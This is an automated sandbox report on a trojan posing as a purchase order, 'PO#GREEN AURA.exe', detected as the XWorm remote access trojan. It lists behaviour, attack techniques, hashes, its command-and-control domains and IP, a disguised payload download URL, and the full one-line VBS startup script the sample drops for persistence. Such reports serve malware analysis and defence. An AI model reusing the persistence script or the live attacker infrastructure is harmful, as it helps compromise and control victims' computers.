Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Queries volume information: C:\Users\user\Desktop\PO#GREEN AURA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PO#GREEN AURA.exe, 00000000.00000002.1843468753.000000000675A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: TaskScheduler.EXE

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO#GREEN AURA.exe PID: 6840, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO#GREEN AURA.exe PID: 2136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PO#GREEN AURA.exe PID: 6840, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO#GREEN AURA.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Count.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Source	Detection	Scanner	Label
http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav	0%	Avira URL Cloud	safe
kingsbkup1.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu	0%	Avira URL Cloud	safe
smfcs3.ydns.eu	0%	Avira URL Cloud	safe
smfcs1.ydns.eu	0%	Avira URL Cloud	safe
bin12.ydns.eu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
win32.ydns.eu	45.144.214.104	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav	false	Avira URL Cloud: safe	unknown
smfcs3.ydns.eu	true	Avira URL Cloud: safe	unknown
kingsbkup1.ydns.eu	true	Avira URL Cloud: safe	unknown
bin12.ydns.eu	true	Avira URL Cloud: safe	unknown
smfcs1.ydns.eu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://win32.ydns.eu	PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.214.104	win32.ydns.eu	Ukraine		47169	HPC-MVM-ASHU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1630686
Start date and time:	2025-03-06 07:05:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO#GREEN AURA.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@4/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 96% Number of executed functions: 96 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 40.126.32.72, 13.107.253.72, 4.245.163.56, 20.223.35.26, 2.23.227.215
Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PO#GREEN AURA.exe, PID 6840 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:06:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.144.214.104	pictures and specifications.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3
	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
win32.ydns.eu	pictures and specifications.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HPC-MVM-ASHU	pictures and specifications.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	nklarm.elf	Get hash	malicious	Unknown	Browse	45.131.150.251
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	1ZXaFij.exe	Get hash	malicious	Xmrig	Browse	45.144.212.77
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Auftragsbest#U00e4tigung.exe	Get hash	malicious	Quasar	Browse	45.144.214.107
	IRSTaxRefund.exe	Get hash	malicious	DBatLoader, Remcos	Browse	45.144.214.126
	SCS AWB and Commercial Invoice.exe	Get hash	malicious	Snake Keylogger, XWorm	Browse	45.144.214.104

Process:	C:\Users\user\Desktop\PO#GREEN AURA.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.053109192402332
Encrypted:	false
SSDEEP:	1536:EfDrLD7tmNEoCfjSbHb7RqWYZvZqF3c9MwsUSEJxY87d17:EHLD7Ewub70Wmy3VwQGxY87r7
MD5:	71E0C8F71B15046709D4E250086346A4
SHA1:	9536F9BC5E10128074CDD2597E970B29D44C4BCD
SHA-256:	462E4F6C2647A8FFFB7BE6A37ECA3DFEF4051F9F20A5E8927B446D98D1AF84F0
SHA-512:	15CD09125122F6E79BFFC9112EE888C4AFEF515D09A9598DA2B23CBC240B043E63F1D3D6538C74FC56CD65EEEB756679F1A4D54DD74E0A026BA80A7999DFF2BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d2.g............................N.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H...........................h............................................0..........(......0../.........(....}.......}......\|......(...+..\|....(......0...........(....o.......(.....0...........{......&..,8.(....o.......(....-?..%.}......}.....\|.......(...+.....{......\|............%.}......(....(....(....(....(.... .a..(....(.... .k..(....(......&........}.....\|.....(.........}.....\|....(................................6.\|.....(.......0..7.........(....}.......}.......}

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO#GREEN AURA.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Download File

Process:	C:\Users\user\Desktop\PO#GREEN AURA.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.700070520364181
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5yjn:FER/lFHIwknaZ5s
MD5:	B7B6811983F114787E6D28702308C6F2
SHA1:	5BA48CB2DD40DB58FD9C48B2102B676A04F2C35E
SHA-256:	971C112651121F94A06C1536F27F815FDC9A8E95973BFE1CEEBF8B16786FAD98
SHA-512:	A50BACE60CCCD25F0DDA9F859FBFD2EC2F0CA1AE9AAE4A4F8BEC459664DEB278EBDE233D5A527FD268A2AEDC046DDC509E7B171F45ED97E2DEE186C4E5537FBF
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Count.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.053109192402332
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO#GREEN AURA.exe
File size:	105'984 bytes
MD5:	71e0c8f71b15046709d4e250086346a4
SHA1:	9536f9bc5e10128074cdd2597e970b29d44c4bcd
SHA256:	462e4f6c2647a8fffb7be6a37eca3dfef4051f9f20a5e8927b446d98d1af84f0
SHA512:	15cd09125122f6e79bffc9112ee888c4afef515d09a9598da2b23cbc240b043e63f1d3d6538c74fc56cd65eeeb756679f1a4d54dd74e0a026ba80a7999dff2ba
SSDEEP:	1536:EfDrLD7tmNEoCfjSbHb7RqWYZvZqF3c9MwsUSEJxY87d17:EHLD7Ewub70Wmy3VwQGxY87r7
TLSH:	00A34C2477C9CEC1C35C14B8E997118167F9C2921703FB9BEE8668B42D03752AA7727E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d2.g............................N.... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41b24e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C93264 [Thu Mar 6 05:28:04 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1b1f4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x19254	0x19400	9eb204a6fd56059714b36f565115c2a5	False	0.4844040068069307	data	6.097329012718951	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1c000	0x600	0x600	b8242d5aabfc3add3faf9975b8f35096	False	0.4205729166666667	data	4.184929006297323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1e000	0xc	0x200	35f7c8a473a42730fa9834961a7a4394	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1c0a0	0x33c	data			0.4178743961352657
RT_MANIFEST	0x1c3dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	PO#GREEN AURA
FileVersion	1.0.0.0
InternalName	PO#GREEN AURA.exe
LegalCopyright	Copyright 2011
LegalTrademarks
OriginalFilename	PO#GREEN AURA.exe
ProductName	PO#GREEN AURA
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 6, 2025 07:06:13.361738920 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:13.367985964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:13.368112087 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:13.369082928 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:13.374133110 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195303917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195379019 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195400000 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195417881 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195456982 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195492983 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195529938 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195564985 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195601940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195640087 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.195687056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.195687056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.195687056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.195687056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.200681925 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.200850964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.200887918 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.200922966 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.200997114 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.326556921 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326606035 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326699018 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326807976 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326842070 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326877117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326911926 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326930046 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.326950073 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.326982021 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.327047110 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.327047110 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.327047110 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.327594042 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.327646017 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.327687025 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.327725887 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.327783108 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.327783108 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.328177929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328231096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328269958 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328331947 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328377008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328387976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.328387976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.328444004 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.328850985 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328887939 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328922033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328957081 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.328994036 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.329054117 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.329054117 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.381964922 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458024025 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458100080 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458138943 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458173990 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458210945 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458245993 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458278894 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458278894 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458283901 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458312035 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458321095 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458355904 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458389997 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458404064 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458441019 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.458909035 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.458970070 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459008932 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459043980 CET	80	49733	45.144.214.104	192.168.2.4
